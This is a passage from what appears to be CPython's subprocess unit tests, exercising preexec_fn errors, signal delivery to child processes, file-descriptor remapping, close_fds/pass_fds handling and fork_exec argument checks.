fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
self.assertEqual(out, b'apple')
self.assertEqual(err, b'orange')
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = import_helper.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
False, [], 0, -1,
func)
# Attempt to prevent
# "TypeError: fork_exec() takes exactly N arguments (M given)"
# from passing the test. More refactoring to have us start
# with a valid *args list, confirm a good call with that works
# before mutating it in various ways to ensure that bad calls
# with individual arg type errors raise a typeerror would be
# ideal. Saving that for a future PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
None, None, None, -1,
None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
